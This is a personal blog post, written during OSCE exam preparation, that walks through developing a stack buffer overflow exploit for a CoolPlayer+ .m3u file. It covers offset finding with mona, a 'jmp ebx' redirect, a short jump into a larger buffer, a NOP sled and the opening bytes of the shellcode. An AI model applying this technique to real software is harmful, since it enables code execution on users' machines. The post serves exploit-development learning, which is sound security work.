While doing my preperation for the OSCE i found an exploit for the coolpalyer+ version 2.19.1 from 2009.
I decided to check this vulnerability in the recent software version (2.19.6) on my Windows 10 machine. The following post descripes the exploit development.

1. create PoC

I created a small python script, which creates a .m3u file with 5000 “A” characters.

After attaching the programm to a debugger and loading the file into the coolplayer, it crashed. The EIP and some registers are overwritten with my characters -> The vulnerability still exists.

2. determine the offsets

For the next step I created a pattern via

pattern_create -l 5000

replaced the “A” characters with it and checked the offsets in immunity debugger with mona via

!mona findmsp

To check this result i changed my exploit script and reload the new file into the coolplayer.


The EIP is overwritten with my “B” in hexformat \x42.

3. looking for jumps into my code cave

I examined the space for the registers and noticed that the ebx register would be a perfect place to jump. Using Mona I Found A Suitable Address Via

!mona jmp -r ebx

I converted the address in reverse hex format and replaced my four “B “s with it.

Loading my new “malicious” file and setting a breakpoint at the call ebx function leading to my capital “A” buffer.

4. checking the possible space

Now i checked the possible space for my shellcode in ebx.

Just 240 bytes -> Too small for a payload such as a reverse shell. I noticed my buffer of capital “C” after some instruction in the end of my first buffer. So i decided to take a short jmp at the end of my first buffer.

5. final exploit

Finally i used a nop sled and placed my shellcode (starting with \xd9\xeb\x9b\xd9\x74\x24).

And Code-Execution !

You can find the final exploit here.